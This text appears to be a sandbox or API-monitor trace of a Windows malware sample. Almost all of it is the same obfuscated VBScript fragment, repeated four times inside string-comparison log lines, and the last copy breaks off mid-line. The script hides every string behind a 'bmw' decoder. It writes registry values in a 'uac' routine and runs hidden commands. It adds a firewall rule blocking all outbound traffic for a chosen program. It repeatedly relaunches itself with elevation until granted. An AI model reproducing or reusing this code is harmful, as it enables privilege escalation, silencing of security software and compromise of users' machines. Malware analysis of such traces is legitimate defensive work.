bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0223.005] wcsncmp (_String1=" then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.005] wcsncmp (_String1="then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0223.005] wcsncmp (_String1="hen\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0223.005] wcsncmp (_String1="en\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.005] wcsncmp (_String1="n\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = 